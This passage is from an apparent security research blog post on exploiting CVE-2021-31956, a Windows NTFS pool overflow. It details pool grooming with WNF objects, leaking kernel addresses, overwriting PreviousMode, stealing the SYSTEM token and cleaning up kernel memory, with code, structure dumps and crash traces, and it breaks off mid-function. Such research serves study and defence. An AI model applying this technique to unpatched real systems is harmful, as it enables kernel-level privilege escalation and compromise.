I hinted in the previous blog post that this vulnerability could likely be exploited without the usage of the separate EPROCESS address leak vulnerability (CVE-2021-31955). This was also realised by Yan ZiShuang and documented within a blog post.

Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution the aim will be to escalate the privileges of their associated userland process or to spawn a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the process's security context and contains things such as the token privileges, token types, session id etc.

CVE-2021-31955 led to an information disclosure of the address of the _EPROCESS structure for each running process on the system and was understood to have been used by the in-the-wild attacks found by Kaspersky. However, in practice, for exploitation of CVE-2021-31956 this separate vulnerability is not needed.

This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Therefore, provided that it is possible to get a relative read/write primitive using a _WNF_STATE_DATA to read from and write to a subsequent _WNF_NAME_INSTANCE, we can overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.

The initial pool layout we are aiming for is as follows:

The difficulty with this is that low fragmentation heap (LFH) randomisation makes reliably achieving this memory layout more difficult, and iteration one of this exploit stayed away from the approach until more research was performed into improving the general reliability and reducing the chances of a BSOD.

As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:

In the absence of an LFH "Heap Randomisation" weakness or vulnerability, this post explains how it is possible to achieve a "reasonably" high level of exploitation success and what clean-up needs to occur in order to maintain system stability post exploitation.

Stage 1: The Spray and Overflow

Starting from where we left off in the first article, we need to go back and rework the spray and overflow.

Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.

We also need to spray _WNF_STATE_DATA objects of size 0xA0, which when added to the header (0x10) and the POOL_HEADER (0x10) also end up as allocated chunks of 0xC0.

As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.

However, as we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take the approach from the previous article of freeing holes and then reusing them, as both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time, and we need both present within the same pool segment.

Therefore, we need to be very careful with the overflow. We make sure that only the following fields are overflowed by 0x10 bytes (and the POOL_HEADER).

In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF

In the case of a corrupted _WNF_STATE_DATA, the Header, AllocatedSize, DataSize and ChangeStamp members will be overflowed:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

As we don’t know whether we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, we can trigger the overflow and check for corruption by looping through each _WNF_STATE_DATA and querying it with NtQueryWnfStateData.

If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.

There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:

  1. We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.

  2. Occasionally the chunk containing our unbounded _WNF_STATE_DATA can be allocated as the final block within the pool segment. This means that when querying with NtQueryWnfStateData, an unmapped memory read will occur off the end of the page. This rarely happens in practice, and increasing the spray size reduces the likelihood of this occurring (see the Exploit Testing and Statistics section).

  3. Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. By performing a large spray size before triggering the overflow, from practical testing, this seems to rarely happen within the test environment.

I think it’s useful to document these challenges with modern memory corruption exploitation techniques where it’s not always possible to gain 100% reliability.

Overall, with 1 remediated and 2 and 3 occurring only very rarely, in lieu of a perfect solution we can move to the next stage.

Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer

Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above and within the first blog post, we can use the relative read to locate an adjacent _WNF_NAME_INSTANCE.

By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.
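As an illustration, the scan can be a simple byte-pattern search over the window of pool memory exposed by the relative read. The sketch below is illustrative rather than taken from the exploit; the 0x03 0x09 0xA8 header bytes are from the dump above, everything else is an assumption:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Scan a window of leaked pool memory for the 3-byte header pattern
 * (0x03 0x09 0xA8) which marks the start of a _WNF_NAME_INSTANCE.
 * Returns the offset of the first match, or -1 if none is found. */
static ptrdiff_t find_name_instance(const uint8_t *window, size_t len)
{
    static const uint8_t pattern[] = { 0x03, 0x09, 0xA8 };

    for (size_t i = 0; i + sizeof(pattern) <= len; i++) {
        if (memcmp(window + i, pattern, sizeof(pattern)) == 0)
            return (ptrdiff_t)i;
    }
    return -1;
}
```

Once a match is found, the interesting member variables can be read from fixed offsets relative to the matched header.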

The CreatorProcess, StateName, StateData and ScopeInstance members can be disclosed from the identified target object.

We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.

Care needs to be taken here to ensure that the new location StateData points at contains sane values for AllocatedSize and DataSize immediately preceding the data we wish to read or write.

In this case the aim was to achieve a full arbitrary read and write, but without the constraint of needing to find sane and reliable AllocatedSize and DataSize values prior to each memory location we wished to write to.

Our overall goal was to target the KTHREAD structure’s PreviousMode member and then make use of the APIs NtReadVirtualMemory and NtWriteVirtualMemory to enable a more flexible arbitrary read and write.

It helps to have a good understanding of how these kernel memory structures are used. In a massively simplified overview, the kernel-mode portion of Windows contains a number of subsystems: the hardware abstraction layer (HAL), the executive subsystems and the kernel. _EPROCESS is part of the executive layer, which deals with general OS policy and operations. The kernel subsystem handles architecture-specific details for low-level operations, and the HAL provides an abstraction layer to deal with differences between hardware.

Processes and threads are represented at both the executive and kernel "layers" within kernel memory as _EPROCESS/_KPROCESS and _ETHREAD/_KTHREAD structures respectively.

The documentation on PreviousMode states "When a user-mode application calls the Nt or Zw version of a native system services routine, the system call mechanism traps the calling thread to kernel mode. To indicate that the parameter values originated in user mode, the trap handler for the system call sets the PreviousMode field in the thread object of the caller to UserMode. The native system services routine checks the PreviousMode field of the calling thread to determine whether the parameters are from a user-mode source."

Looking at MiReadWriteVirtualMemory, which is called from NtWriteVirtualMemory, we can see that if PreviousMode is set to KernelMode (0) when a user-mode thread makes the call, then the address validation is skipped and kernel memory space addresses can be written to:

__int64 __fastcall MiReadWriteVirtualMemory(
        HANDLE Handle,
        size_t BaseAddress,
        size_t Buffer,
        size_t NumberOfBytesToWrite,
        __int64 NumberOfBytesWritten,
        ACCESS_MASK DesiredAccess)
{
  int v7; // er13
  __int64 v9; // rsi
  struct _KTHREAD *CurrentThread; // r14
  KPROCESSOR_MODE PreviousMode; // al
  _QWORD *v12; // rbx
  __int64 v13; // rcx
  NTSTATUS v14; // edi
  _KPROCESS *Process; // r10
  PVOID v16; // r14
  int v17; // er9
  int v18; // er8
  int v19; // edx
  int v20; // ecx
  NTSTATUS v21; // eax
  int v22; // er10
  char v24; // [rsp+40h] [rbp-48h]
  __int64 v25; // [rsp+48h] [rbp-40h] BYREF
  PVOID Object[2]; // [rsp+50h] [rbp-38h] BYREF
  int v27; // [rsp+A0h] [rbp+18h]

  v27 = Buffer;
  v7 = BaseAddress;
  v9 = 0i64;
  Object[0] = 0i64;
  CurrentThread = KeGetCurrentThread();
  PreviousMode = CurrentThread->PreviousMode;
  v24 = PreviousMode;
  if ( PreviousMode )
  {
    if ( NumberOfBytesToWrite + BaseAddress < BaseAddress
      || NumberOfBytesToWrite + BaseAddress > 0x7FFFFFFF0000i64
      || Buffer + NumberOfBytesToWrite < Buffer
      || Buffer + NumberOfBytesToWrite > 0x7FFFFFFF0000i64 )
    {
      return 3221225477i64;
    }
    v12 = (_QWORD *)NumberOfBytesWritten;
    if ( NumberOfBytesWritten )
    {
      v13 = NumberOfBytesWritten;
      if ( (unsigned __int64)NumberOfBytesWritten >= 0x7FFFFFFF0000i64 )
        v13 = 0x7FFFFFFF0000i64;
      *(_QWORD *)v13 = *(_QWORD *)v13;
    }
  }

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

 dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this is correct (and see we hit our breakpoint in the previous article):

0: kd> !thread 0xffffd18606a54080
THREAD ffffd18606a54080  Cid 1da0.1da4  Teb: 000000ce177e0000 Win32Thread: 0000000000000000 RUNNING on processor 0
IRP List:
    ffffd18608002050: (0006,0430) Flags: 00060004  Mdl: 00000000
Not impersonating
DeviceMap                 ffffba0cc30c6630
Owning Process            ffffd186087b1300       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      2344           Ticks: 1 (0:00:00:00.015)
Context Switch Count      149            IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.015
Win32 Start Address 0x00007ff6da2c305c
Stack Init ffffd0096cdc6c90 Current ffffd0096cdc6530
Base ffffd0096cdc7000 Limit ffffd0096cdc1000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd009`6cdc62a8 fffff805`5a99bc7a : 00000000`00000000 00000000`000000d0 00000000`00000000 ffffba0c`00000000 : Ntfs!NtfsQueryEaUserEaList
ffffd009`6cdc62b0 fffff805`5a9fc8a6 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002300 ffffd186`06a54000 : Ntfs!NtfsCommonQueryEa+0x22a
ffffd009`6cdc6410 fffff805`5a9fc600 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002050 ffffd009`6cdc7000 : Ntfs!NtfsFsdDispatchSwitch+0x286
ffffd009`6cdc6540 fffff805`570d1f35 : ffffd009`6cdc68b0 fffff805`54704b46 ffffd009`6cdc7000 ffffd009`6cdc1000 : Ntfs!NtfsFsdDispatchWait+0x40
ffffd009`6cdc67e0 fffff805`54706ccf : ffffd186`02802940 ffffd186`00000030 00000000`00000000 00000000`00000000 : nt!IofCallDriver+0x55
ffffd009`6cdc6820 fffff805`547048d3 : ffffd009`6cdc68b0 00000000`00000000 00000000`00000001 ffffd186`03074bc0 : FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x28f
ffffd009`6cdc6890 fffff805`570d1f35 : ffffd186`08002050 00000000`000000c0 00000000`000000c8 00000000`000000a4 : FLTMGR!FltpDispatch+0xa3
ffffd009`6cdc68f0 fffff805`574a6fb8 : ffffd186`08002050 00000000`00000000 00000000`00000000 fffff805`577b2094 : nt!IofCallDriver+0x55
ffffd009`6cdc6930 fffff805`57455834 : 000000ce`00000000 ffffd009`6cdc6b80 ffffd186`084eb7b0 ffffd009`6cdc6b80 : nt!IopSynchronousServiceTail+0x1a8
ffffd009`6cdc69d0 fffff805`572058b5 : ffffd186`06a54080 000000ce`178fdae8 000000ce`178feba0 00000000`000000a3 : nt!NtQueryEaFile+0x484
ffffd009`6cdc6a90 00007fff`0bfae654 : 00007ff6`da2c14dd 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd009`6cdc6b00)
000000ce`178fdac8 00007ff6`da2c14dd : 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba : ntdll!NtQueryEaFile+0x14
000000ce`178fdad0 00007ff6`da2c4490 : 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 : 0x00007ff6`da2c14dd
000000ce`178fdad8 00000000`000000a3 : 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 : 0x00007ff6`da2c4490
000000ce`178fdae0 000000ce`178fbee8 : 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 000000ce`00000017 : 0xa3
000000ce`178fdae8 0000026e`edf509ba : 00000000`00000000 000000ce`178fdba0 000000ce`00000017 00000000`00000000 : 0x000000ce`178fbee8
000000ce`178fdaf0 00000000`00000000 : 000000ce`178fdba0 000000ce`00000017 00000000`00000000 0000026e`00000001 : 0x0000026e`edf509ba

So we now know how to calculate the address of the `_KTHREAD` kernel data structure which is associated with our running exploit thread. 


At the end of stage 2 we have the following memory layout:

Stage 3 – Abusing PreviousMode

Once we have set the StateData pointer of the _WNF_NAME_INSTANCE to just before the _KPROCESS ThreadListHead Flink, we can leak out its value by having it confused with the DataSize and ChangeStamp members. After querying the object, we can then reconstruct it as FLINK = ((uintptr_t)ChangeStamp << 32) | DataSize.

This allows us to calculate the _KTHREAD address using FLINK - 0x2f8.
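The reconstruction and subtraction are simple arithmetic; a minimal sketch is shown below. The 0x2F8 ThreadListEntry offset is taken from the version of Windows tested and will vary between builds:

```c
#include <assert.h>
#include <stdint.h>

/* ThreadListEntry offset within _KTHREAD; build-specific. */
#define THREAD_LIST_ENTRY_OFFSET 0x2F8ULL

/* Rebuild the leaked ThreadListHead Flink from the two 32-bit values
 * returned as DataSize (low dword) and ChangeStamp (high dword), then
 * subtract the ThreadListEntry offset to recover the _KTHREAD base. */
static uint64_t kthread_from_leak(uint32_t data_size, uint32_t change_stamp)
{
    uint64_t flink = ((uint64_t)change_stamp << 32) | data_size;
    return flink - THREAD_LIST_ENTRY_OFFSET;
}
```

Using the example values from the debugger output above, a Flink of 0xffffd18606a54378 yields a _KTHREAD base of 0xffffd18606a54080.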

Once we have the address of the _KTHREAD, we need to again find a sane value to confuse with the AllocatedSize and DataSize, to allow reading and writing of the PreviousMode value at offset 0x232.

In this case, pointing it into here:

   +0x220 Process          : 0xffff900f`56ef0340 _KPROCESS
   +0x228 UserAffinity     : _GROUP_AFFINITY
   +0x228 UserAffinityFill : [10]  "???"

Gives the following "sane" values:

dt _WNF_STATE_DATA FLINK-0x2f8+0x220

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffff900f
   +0x008 DataSize         : 3
   +0x00c ChangeStamp      : 0

This allows the most significant dword of the Process pointer shown above to be used as the AllocatedSize and the UserAffinity to act as the DataSize. Incidentally, we can actually influence the value used for DataSize using SetProcessAffinityMask or by launching the process with start /affinity exploit.exe, but for our purposes of being able to read and write PreviousMode this is fine.

Visually this looks as follows after the StateData has been modified:

This gives a 3-byte read (and up to 0xffff900f bytes of write if needed – but we only need 3 bytes), which includes the PreviousMode (i.e. set to 1 before modification):

00 00 01 00 00 00 00 00  00 00 | ..........

Using the most significant dword of the pointer, which is always a kernel-mode address, ensures that the AllocatedSize is sufficient to enable overwriting PreviousMode.
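To see why PreviousMode lands at byte 2 of the returned data: the fake _WNF_STATE_DATA header occupies 0x10 bytes starting at _KTHREAD+0x220, so the data returned by the query begins at _KTHREAD+0x230 and PreviousMode at +0x232 sits two bytes in. A sketch of the arithmetic (the offsets are from the build tested and will differ between versions):

```c
#include <assert.h>
#include <stdint.h>

#define KTHREAD_PROCESS_OFFSET      0x220u /* where the fake StateData points */
#define WNF_STATE_DATA_HEADER_SIZE  0x10u  /* Header + AllocatedSize + DataSize + ChangeStamp */
#define KTHREAD_PREVIOUSMODE_OFFSET 0x232u /* build-specific */

/* Offset of PreviousMode within the data returned once StateData has
 * been pointed at _KTHREAD+0x220. */
static uint32_t previousmode_data_offset(void)
{
    return KTHREAD_PREVIOUSMODE_OFFSET
         - (KTHREAD_PROCESS_OFFSET + WNF_STATE_DATA_HEADER_SIZE);
}
```

This matches the hex dump above, where the 01 value (PreviousMode before modification) appears at byte index 2.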

Post Exploitation

Once we have set PreviousMode to 0, as mentioned above, this gives an unconstrained read/write across the whole kernel memory space using NtWriteVirtualMemory and NtReadVirtualMemory. This is a very powerful method and demonstrates the value of moving from an awkward-to-use arbitrary read/write to a method which enables easier post-exploitation and enhanced clean-up options.

It is then trivial to walk the ActiveProcessLinks within the _EPROCESS, obtain a pointer to a SYSTEM token and replace the existing token with it, or to escalate by overwriting the _SEP_TOKEN_PRIVILEGES of the existing token, using techniques which have long been used by Windows exploits.
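The ActiveProcessLinks walk can be sketched as below, built over an abstract read64 primitive. This is illustrative only: the find_eprocess_by_pid helper is hypothetical, and the UniqueProcessId and ActiveProcessLinks offsets must be resolved for the target build rather than the placeholder values used in the test:

```c
#include <assert.h>
#include <stdint.h>

typedef uint64_t (*read64_fn)(uint64_t addr);

/* Walk the circular EPROCESS ActiveProcessLinks list starting from any
 * known EPROCESS until the entry whose UniqueProcessId matches pid is
 * found (PID 4 = System). pid_off and links_off are the build-specific
 * offsets of UniqueProcessId and ActiveProcessLinks within _EPROCESS.
 * Returns 0 if the PID is not found. */
static uint64_t find_eprocess_by_pid(read64_fn read64, uint64_t start_eprocess,
                                     uint64_t pid, uint64_t pid_off,
                                     uint64_t links_off)
{
    uint64_t cur = start_eprocess;
    do {
        if (read64(cur + pid_off) == pid)
            return cur;
        /* Flink points at the next entry's ActiveProcessLinks member. */
        cur = read64(cur + links_off) - links_off;
    } while (cur != start_eprocess);
    return 0;
}
```

With the SYSTEM _EPROCESS located, its Token member can be read and written into our own _EPROCESS using the same primitives.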

Kernel Memory Cleanup

OK, so the above is good enough for a proof-of-concept exploit, but due to the potentially large number of memory writes needed for exploit success, it could leave the kernel in a bad state. Also, when the process terminates, certain memory locations which have been overwritten could trigger a BSOD when that corrupted memory is used.

This part of the exploitation process is often overlooked by proof-of-concept exploit writers, but is often the most challenging for use in real-world scenarios (red teams / simulated attacks etc.) where stability and reliability are important. Going through this process also helps understand how these types of attacks can be detected.

This section of the blog describes some improvements which can be made in this area.

PreviousMode Restoration

On the version of Windows tested, if we try to launch a new process as SYSTEM whilst PreviousMode is still set to 0, we end up with the following crash:

```
Access violation - code c0000005 (!!! second chance !!!)
nt!PspLocateInPEManifest+0xa9:
fffff804`502f1bb5 0fba68080d      bts     dword ptr [rax+8],0Dh
0: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffff8583`c6259c90 fffff804`502f0689 : 00000195`b24ec500 00000000`00000000 00000000`00000428 00007ff6`00000000 : nt!PspLocateInPEManifest+0xa9
01 ffff8583`c6259d00 fffff804`501f19d0 : 00000000`000022aa ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspSetupUserProcessAddressSpace+0xdd
02 ffff8583`c6259db0 fffff804`5021ca6d : 00000000`00000000 ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspAllocateProcess+0x11a4
03 ffff8583`c625a2d0 fffff804`500058b5 : 00000000`00000002 00000000`00000001 00000000`00000000 00000195`b24ec560 : nt!NtCreateUserProcess+0x6ed
04 ffff8583`c625aa90 00007ffd`b35cd6b4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffff8583`c625ab00)
05 0000008c`c853e418 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtCreateUserProcess+0x14
```

More research needs to be performed to determine if this is necessary on prior versions or if this was a recently introduced change.

This can be fixed simply by using NtWriteVirtualMemory to restore the PreviousMode value to 1 before launching the cmd.exe shell.

StateData Pointer Restoration

The _WNF_STATE_DATA StateData pointer is freed when the _WNF_NAME_INSTANCE is freed on process termination (incidentally, this is also an arbitrary free). If it is not restored to its original value, we will end up with a crash as follows:

00 ffffdc87`2a708cd8 fffff807`27912082 : ffffdc87`2a708e40 fffff807`2777b1d0 00000000`00000100 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffdc87`2a708ce0 fffff807`27911666 : 00000000`00000003 ffffdc87`2a708e40 fffff807`27808e90 00000000`0000013a : nt!KiBugCheckDebugBreak+0x12
02 ffffdc87`2a708d40 fffff807`277f3fa7 : 00000000`00000003 00000000`00000023 00000000`00000012 00000000`00000000 : nt!KeBugCheck2+0x946
03 ffffdc87`2a709450 fffff807`2798d938 : 00000000`0000013a 00000000`00000012 ffffa409`6ba02100 ffffa409`7120a000 : nt!KeBugCheckEx+0x107
04 ffffdc87`2a709490 fffff807`2798d998 : 00000000`00000012 ffffdc87`2a7095a0 ffffa409`6ba02100 fffff807`276df83e : nt!RtlpHeapHandleError+0x40
05 ffffdc87`2a7094d0 fffff807`2798d5c5 : ffffa409`7120a000 ffffa409`6ba02280 ffffa409`6ba02280 00000000`00000001 : nt!RtlpHpHeapHandleError+0x58
06 ffffdc87`2a709500 fffff807`2786667e : ffffa409`71293280 00000000`00000001 00000000`00000000 ffffa409`6f6de600 : nt!RtlpLogHeapFailure+0x45
07 ffffdc87`2a709530 fffff807`276cbc44 : 00000000`00000000 ffffb504`3b1aa7d0 00000000`00000000 ffffb504`00000000 : nt!RtlpHpVsContextFree+0x19954e
08 ffffdc87`2a7095d0 fffff807`27db2019 : 00000000`00052d20 ffffb504`33ea4600 ffffa409`712932a0 01000000`00100000 : nt!ExFreeHeapPool+0x4d4        
09 ffffdc87`2a7096b0 fffff807`27a5856b : ffffb504`00000000 ffffb504`00000000 ffffb504`3b1ab020 ffffb504`00000000 : nt!ExFreePool+0x9
0a ffffdc87`2a7096e0 fffff807`27a58329 : 00000000`00000000 ffffa409`712936d0 ffffa409`712936d0 ffffb504`00000000 : nt!ExpWnfDeleteStateData+0x8b
0b ffffdc87`2a709710 fffff807`27c46003 : ffffffff`ffffffff ffffb504`3b1ab020 ffffb504`3ab0f780 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1ed
0c ffffdc87`2a709760 fffff807`27b0553e : 00000000`00000000 ffffdc87`2a709990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0d ffffdc87`2a7097a0 fffff807`27a9ea7f : ffffa409`7129d080 ffffb504`336506a0 ffffdc87`2a709990 00000000`00000000 : nt!ExWnfExitProcess+0x32
0e ffffdc87`2a7097d0 fffff807`279f4558 : 00000000`c000013a 00000000`00000001 ffffdc87`2a7099e0 00000055`8b6d6000 : nt!PspExitThread+0x5eb
0f ffffdc87`2a7098d0 fffff807`276e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff807`276f0ee6 : nt!KiSchedulerApcTerminate+0x38
10 ffffdc87`2a709910 fffff807`277f8440 : 00000000`00000000 ffffdc87`2a7099c0 ffffdc87`2a709b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
11 ffffdc87`2a7099c0 fffff807`2780595f : ffffa409`71293000 00000251`173f2b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
12 ffffdc87`2a709b00 00007ff9`18cabe44 : 00007ff9`165d26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffdc87`2a709b00)
13 00000055`8b8ffb28 00007ff9`165d26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`18c5a800 : ntdll!NtWaitForSingleObject+0x14
14 00000055`8b8ffb30 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`18c5a800 00000000`00000000 : 0x00007ff9`165d26ee

Although we could restore this using the WNF relative read/write, as we now have arbitrary read and write via the APIs, we can instead implement a function which uses a previously saved ScopeInstance pointer to look up our targeted _WNF_NAME_INSTANCE by its StateName and recover its address.

Visually this looks as follows:

Some example code for this is:

/**
* This function returns back the address of a _WNF_NAME_INSTANCE looked up by its internal StateName
* It performs an _RTL_AVL_TREE tree walk against the sorted tree of _WNF_NAME_INSTANCES. 
* The tree root is at _WNF_SCOPE_INSTANCE+0x38 (NameSet)
**/
QWORD* FindStateName(unsigned __int64 StateName)
{
    QWORD* i;
    
    // _WNF_SCOPE_INSTANCE+0x38 (NameSet)
    for (i = (QWORD*)read64((char*)BackupScopeInstance+0x38); ; i = (QWORD*)read64((char*)i + 0x8))
    {

        while (1)
        {
